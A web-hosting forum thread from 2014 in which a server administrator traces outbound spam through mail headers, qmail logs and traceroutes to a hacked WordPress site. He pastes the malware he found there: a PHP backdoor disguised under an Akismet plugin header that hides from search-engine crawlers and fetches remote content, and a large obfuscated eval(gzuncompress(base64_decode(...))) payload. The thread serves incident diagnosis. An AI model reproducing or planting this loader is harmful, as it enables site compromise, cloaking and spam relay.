MRatWork Forum by Mustafa Ramadhan

Sawo Project - Kloxo-MR Discussions => Kloxo-MR Bugs and Requests => Topic started by: Spacedust on 2014-12-08, 08:42:37

Title: My server is sending SPAM but source cannot be tracked !
Post by: Spacedust on 2014-12-08, 08:42:37
Please see this:

Quote
X-HmXmrOriginalRecipient: charlesmccue@hotmail.com
x-store-info:4r51+eLowCe79NzwdU2kR3P+ctWZsO+J
Authentication-Results: hotmail.com; spf=none (sender IP is 78.46.85.x) smtp.mailfrom=elurleneqb@aclama.com; dkim=none header.d=aclama.com; x-hmca=none header.id=elurleneqb@aclama.com
X-SID-PRA: elurleneqb@aclama.com
X-AUTH-Result: NONE
X-SID-Result: NONE
X-Message-Status: n:n
X-Message-Delivery: Vj0xLjE7dXM9MDtsPTA7YT0wO0Q9MjtHRD0yO1NDTD02
X-Message-Info: q7bX5s87Og//UscsqJoXfpcDjfC2euuvvMxWpOn/Va9dqVH2UjhCRDVwS94hUAdvhFNh0j45xVlzkcPd2prHkxN3Ou2Rt3oTy570TI/RgRjHtnolhq0dQEDJQ+9dMYojDw1JH+3WmCx+jlqmvVna4LXGfDvDqNgosxB66HG0j/spfGj0954HJUyWM7TeuURdjn6UOi64en+SItCByepAAtx8Ic0btb7j
Received: from mail.xxx.pl ([78.46.85.x]) by BAY004-MC4F44.hotmail.com with Microsoft SMTPSVC(7.5.7601.22751);
    Mon, 8 Dec 2014 05:26:28 -0800
From: Elizabeth <elurleneqb@aclama.com>
Subtrahend-Oxnard: fad6187daf
Netting-Establishment: c7ccdb356d8b
Content-Transfer-Encoding: 7bit
Message-ID: <BF13f7CA3f2.2C1598a46E8fa1dD53d626Bf7cBE@aclama.com>
MIME-Version: 1.0
Content-Type: text/html; charset=UTF-8
To: charlesmccue@hotmail.com
Date: Mon, 8 Dec 2014 14:26:28 +0000
Liters-Yankees-Authenticated: 5222
Subject: Aspect Charlesmccue
Return-Path: elurleneqb@aclama.com
X-OriginalArrivalTime: 08 Dec 2014 13:26:28.0393 (UTC) FILETIME=[928A5190:01D012EA]
Title: Re: My server is sending SPAM but source cannot be tracked !
Post by: MRatWork on 2014-12-08, 10:34:26
Possible using phpmailer because this function possible 'header' customizing.
Title: Re: My server is sending SPAM but source cannot be tracked !
Post by: MRatWork on 2014-12-08, 10:35:47
Is enable spamdyke?.
Title: Re: My server is sending SPAM but source cannot be tracked !
Post by: Spacedust on 2014-12-08, 11:05:30
Yes. Spamdyke is enabled.

Another one !

Quote
X-HmXmrOriginalRecipient: helenzinha_lima13@hotmail.com
X-Reporter-IP: 186.233.255.89
X-Message-Guid: d56567eb-7ee0-11e4-94b6-d89d675ff29c
x-store-info:4r51+eLowCe79NzwdU2kR3P+ctWZsO+J
Authentication-Results: hotmail.com; spf=fail (sender IP is 78.46.85.x) smtp.mailfrom=hanyhasan@mail2world.com; dkim=none header.d=mail2world.com; x-hmca=fail header.id=hanyhasan@mail2world.com
X-SID-PRA: hanyhasan@mail2world.com
X-AUTH-Result: FAIL
X-SID-Result: FAIL
X-Message-Status: n:n
X-Message-Delivery: Vj0xLjE7dXM9MDtsPTA7YT0wO0Q9MjtHRD0yO1NDTD02
X-Message-Info: q7bX5s87Og//UscsqJoXfo7N4O1rNuooOznDj8QMbwkS1c58rQH6mde6KaR0p/PA/TsZgKL5/rSz2eHL87oxAC0iA8Mknxz6hddIFcQLpenVFifbg68fLslk8oPe6dzDbvchv94euJwop5xrh0KRHmkDwG99K+xY7+VynySnWFC9+RNxkrYsONhw57fGirV0OwPGSRmjHdmWiG3ucG54xRK/Z8PXwdlf
Received: from mail.xxx.pl ([78.46.85.x]) by COL004-MC6F32.hotmail.com with Microsoft SMTPSVC(7.5.7601.22751);
    Mon, 8 Dec 2014 05:48:12 -0800
To: helenzinha_lima13@hotmail.com
Content-Type: text/html; charset=UTF-8
From: hanyhasan@mail2world.com
Towering-Thermodynamics-Apathy: 7621978A2
Conspires-Longstreet: 4B3D1537CEE
Content-Transfer-Encoding: 7bit
Date: Mon, 8 Dec 2014 14:48:12 +0000
Message-ID: <546dAaD6d.C1eFbCaeF8a8aF4E.F82Cef2D5EBB6ca6@mail2world.com>
Subject: Possesses Helenzinha Lima
MIME-Version: 1.0
Sidewise-Curs-Unesco: 8565
Return-Path: hanyhasan@mail2world.com
X-OriginalArrivalTime: 08 Dec 2014 13:48:12.0877 (UTC) FILETIME=[9C12C7D0:01D012ED]
Title: Re: My server is sending SPAM but source cannot be tracked !
Post by: chrisf on 2014-12-08, 20:42:27
This is another reason we need to disable php ini sendmail path change for clients.
Title: Re: My server is sending SPAM but source cannot be tracked !
Post by: MRatWork on 2014-12-08, 21:51:39
@Spacedust,

Read http://www.codero.com/knowledge-base/questions/290/How+to+find+the+source+of+unknown+mail+when+using+qmail
Title: Re: My server is sending SPAM but source cannot be tracked !
Post by: Spacedust on 2014-12-09, 09:14:36
@Spacedust,

Read http://www.codero.com/knowledge-base/questions/290/How+to+find+the+source+of+unknown+mail+when+using+qmail

I have sendmail-limits already installed ! Nothing wrong is reported out there !

Example of report:

Quote
Dec  9 16:26:32 online send: 1418138792.102454 new msg 798125
Dec  9 16:26:32 online send: 1418138792.102478 info msg 798125: bytes 2044 from <anonymous@mail.xxx.pl> qp 25314 uid 48
Dec  9 16:26:32 online send: 1418138792.107146 starting delivery 2849: msg 798125 to remote stiomsch@yahoo.com
Dec  9 16:26:32 online send: 1418138792.107165 status: local 0/500 remote 2/200
Dec  9 16:26:32 online send: 1418138792.540848 delivery 2848: deferral: Connected_to_98.138.112.33_but_sender_was_rejected./Remote_host_said:_421_4.7.0_[TS01]_Messages_from_78.46.85.x_temporarily_deferred_due_to_user_complaints_-_4.16.55.1;_see_http://postmaster.yahoo.com/421-ts01.html/
Dec  9 16:26:32 online send: 1418138792.540868 status: local 0/500 remote 1/200
Title: Re: My server is sending SPAM but source cannot be tracked !
Post by: Spacedust on 2014-12-09, 09:39:56
Someone is trying to spoof localhost with some other server and trying to login as admin user.

Please see this:

Quote
Dec  9 16:36:09 online vpopmail[19312]: vchkpw-smtp: vpopmail user not found admin@:113.165.73.218

It has spoofed revDNS as localhost:

 
Quote
1. static.65.85.46.78.clients.your-server.de                                                               0.0%     2    0.7   2.7   0.7   4.7   2.8
 2. hos-tr4.juniper2.rz12.hetzner.de                                                                        0.0%     2   11.3   5.7   0.2  11.3   7.9
 3. core22.hetzner.de                                                                                       0.0%     2    0.2   0.2   0.2   0.2   0.0
 4. core11.hetzner.de                                                                                       0.0%     2    2.8   2.8   2.8   2.8   0.0
 5. juniper4.rz2.hetzner.de                                                                                 0.0%     2    2.8   2.8   2.8   2.8   0.0
 6. r1nue2.core.init7.net                                                                                   0.0%     2    3.0   3.0   3.0   3.0   0.0
 7. r1fra3.core.init7.net                                                                                   0.0%     2    5.9  11.7   5.9  17.6   8.2
 8. pni-pccw.fra3.init7.net                                                                                 0.0%     2    6.1   6.1   6.1   6.1   0.0
 9. ???
10. ???
11. ???
12. localhost                                                                                               0.0%     2  315.0 315.0 315.0 315.0   0.0
13. localhost                                                                                               0.0%     1  316.1 316.1 316.1 316.1   0.0
14. localhost                                                                                               0.0%     1  344.8 344.8 344.8 344.8   0.0

Title: Re: My server is sending SPAM but source cannot be tracked !
Post by: Spacedust on 2014-12-12, 06:33:39
Still not resolved !

We are now banned on yahoo, hotmail and comcast !
Title: Re: My server is sending SPAM but source cannot be tracked !
Post by: MRatWork on 2014-12-12, 07:06:40
Update your qmail-toaster because the latest including report 'caller' of 'sendmail' (usually using by php mail()). Need cleanup/fixmail-all.
Title: Re: My server is sending SPAM but source cannot be tracked !
Post by: Spacedust on 2014-12-12, 10:24:33
I've updated it and still nothing - yahoo and comcast unlocked us - hotmail is still banned.
Title: Re: My server is sending SPAM but source cannot be tracked !
Post by: MRatWork on 2014-12-12, 10:45:34
latest qmail-toaster just add info 'caller' of 'php mail()' in maillog log file. It's not for prevent/protect purpose.
Title: Re: My server is sending SPAM but source cannot be tracked !
Post by: Spacedust on 2014-12-12, 14:09:16
Got that domain finally ;) We will see how it works now.
Title: Re: My server is sending SPAM but source cannot be tracked !
Post by: Spacedust on 2014-12-14, 14:58:24
Still not resolved. Now we are banned on yahoo, hotmail, gmx, comcast etc.

It's not sendmail. It's something else !
Title: Re: My server is sending SPAM but source cannot be tracked !
Post by: Spacedust on 2014-12-14, 15:14:27
Please see how it looks like in hotmail:
Title: Re: My server is sending SPAM but source cannot be tracked !
Post by: Spacedust on 2014-12-15, 05:24:09
Another domain suspended - some hacked Wordpress installation :(
Title: Re: My server is sending SPAM but source cannot be tracked !
Post by: MRatWork on 2014-12-15, 06:47:56
Try install wordfence plugins.
Title: Re: My server is sending SPAM but source cannot be tracked !
Post by: Spacedust on 2014-12-15, 11:11:18
Another mail tracked ! It seems phpmailer is sending these e-mails !

I've banned this domain ! Seems to be hacked

Quote
--------------
MESSAGE NUMBER 794367
 --------------
Received: (qmail 772 invoked by uid 7865); 15 Dec 2014 16:53:28 -0000
To: smacker86live@gmail.com
Subject: Re: aergfdgbhdghfr
Date: Mon, 15 Dec 2014 17:53:27 +0100
From: rkjdsef hn yrthynees45 gtyj 6uear grft <xcvdfge3ukyer345y65uhtrdfg@consultant.com>
Message-ID: <22d9c1f88c0e35070ab8f5683042f68d@naszaxxx.com>
X-Priority: 3
X-Mailer: PHPMailer 5.2.2 (http://code.google.com/a/apache-extras.org/p/phpmailer/)
MIME-Version: 1.0
Content-Type: multipart/alternative;
   boundary="b1_22d9c1f88c0e35070ab8f5683042f68d"

--b1_22d9c1f88c0e35070ab8f5683042f68d
Content-Type: text/plain; charset=iso-8859-1
Content-Transfer-Encoding: 8bit

host http://naszaxxx.com/tvltasf.php?m=s


--b1_22d9c1f88c0e35070ab8f5683042f68d
Content-Type: text/html; charset=iso-8859-1
Content-Transfer-Encoding: 8bit

<html><head></head><body>host http://naszaxxx.com/tvltasf.php?m=s<br/>
</body></html>



--b1_22d9c1f88c0e35070ab8f5683042f68d--
Title: Re: My server is sending SPAM but source cannot be tracked !
Post by: Spacedust on 2014-12-15, 12:45:27
Wow - what a nasty hackers. See yourself !



Proper code starts here:

Quote
<?php session_start(); ?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" xmlns="http://www.w3.org/1999/xhtml">
<head>

etc.

Then something wrong...

Quote
<?php
#17345a#
/**
 * @package Akismet
 */
/*
Plugin Name: Akismet
Plugin URI: http://akismet.com/
Description: Used by millions, Akismet is quite possibly the best way in the world to <strong>protect your blog from comment and trackback spam</strong>. It keeps your site protected from spam even while you sleep. To get started: 1) Click the "Activate" link to the left of this description, 2) <a href="http://akismet.com/get/">Sign up for an Akismet API key</a>, and 3) Go to your Akismet configuration page, and save your API key.
Version: 3.0.0
Author: Automattic
Author URI: http://automattic.com/wordpress-plugins/
License: GPLv2 or later
Text Domain: akismet
*/

/*
This program is free software; you can redistribute it and/or
modify it under the terms of the GNU General Public License
as published by the Free Software Foundation; either version 2
of the License, or (at your option) any later version.

This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
GNU General Public License for more details.

You should have received a copy of the GNU General Public License
along with this program; if not, write to the Free Software
Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA  02110-1301, USA.
*/

if( empty( $zjl ) ) {
    if( ( substr( trim( $_SERVER['REMOTE_ADDR'] ), 0, 6 ) == '74.125' ) || preg_match(
            "/(googlebot|msnbot|yahoo|search|bing|ask|indexer)/i",
            $_SERVER['HTTP_USER_AGENT']
        )
    ) {
    } else {
        error_reporting( 0 );
        @ini_set( 'display_errors', 0 );
        if( !function_exists( '__url_get_contents' ) ) {
            function __url_get_contents( $remote_url, $timeout )
            {
                if( function_exists( 'curl_exec' ) ) {
                    $ch = curl_init();
                    curl_setopt( $ch, CURLOPT_URL, $remote_url );
                    curl_setopt( $ch, CURLOPT_RETURNTRANSFER, true );
                    curl_setopt( $ch, CURLOPT_CONNECTTIMEOUT, $timeout );
                    curl_setopt( $ch, CURLOPT_TIMEOUT, $timeout ); //timeout in seconds
                    $_url_get_contents_data = curl_exec( $ch );
                    curl_close( $ch );
                } elseif( function_exists( 'file_get_contents' ) && ini_get( 'allow_url_fopen' ) ) {
                    $ctx = @stream_context_create(
                        array(
                            'http' =>
                                array(
                                    'timeout' => $timeout,
                                )
                        )
                    );
                    $_url_get_contents_data = @file_get_contents( $remote_url, false, $ctx );
                } elseif( function_exists( 'fopen' ) && function_exists( 'stream_get_contents' ) ) {
                    $handle = @fopen( $remote_url, "r" );
                    $_url_get_contents_data = @stream_get_contents( $handle );
                } else {
                    $_url_get_contents_data = __file_get_url_contents( $remote_url );
                }
                return $_url_get_contents_data;
            }
        }

        if( !function_exists( '__file_get_url_contents' ) ) {
            function __file_get_url_contents( $remote_url )
            {
                if( preg_match(
                    '/^([a-z]+):\/\/([a-z0-9-.]+)(\/.*$)/i',
                    $remote_url,
                    $matches
                )
                ) {
                    $protocol = strtolower( $matches[1] );
                    $host = $matches[2];
                    $path = $matches[3];
                } else {
                    // Bad remote_url-format
                    return false;
                }
                if( $protocol == "http" ) {
                    $socket = @fsockopen( $host, 80, $errno, $errstr, $timeout );
                } else {
                    // Bad protocol
                    return false;
                }
                if( !$socket ) {
                    // Error creating socket
                    return false;
                }
                $request = "GET $path HTTP/1.0\r\nHost: $host\r\n\r\n";
                $len_written = @fwrite( $socket, $request );
                if( $len_written === false || $len_written != strlen( $request ) ) {
                    // Error sending request
                    return false;
                }
                $response = "";
                while( !@feof( $socket ) &&
                    ( $buf = @fread( $socket, 4096 ) ) !== false ) {
                    $response .= $buf;
                }
                if( $buf === false ) {
                    // Error reading response
                    return false;
                }
                $end_of_header = strpos( $response, "\r\n\r\n" );
                return substr( $response, $end_of_header + 4 );
            }
        }

        $zjl['SCRIPT_FILENAME'] = $_SERVER['SCRIPT_FILENAME'];
        $zjl['SCRIPT_NAME'] = $_SERVER['SCRIPT_NAME'];
        $zjl['PHP_SELF'] = $_SERVER['PHP_SELF'];
        $zjl['HTTP_HOST'] = $_SERVER['HTTP_HOST'];
        $zjl['REDIRECT_STATUS'] = $_SERVER['REDIRECT_STATUS'];
        $zjl['SERVER_NAME'] = $_SERVER['SERVER_NAME'];
        $zjl['SERVER_ADDR'] = $_SERVER['SERVER_ADDR'];

Plus a lot of files like this:

Quote
cat tvltasf.php
<?php
eval(gzuncompress(base64_decode('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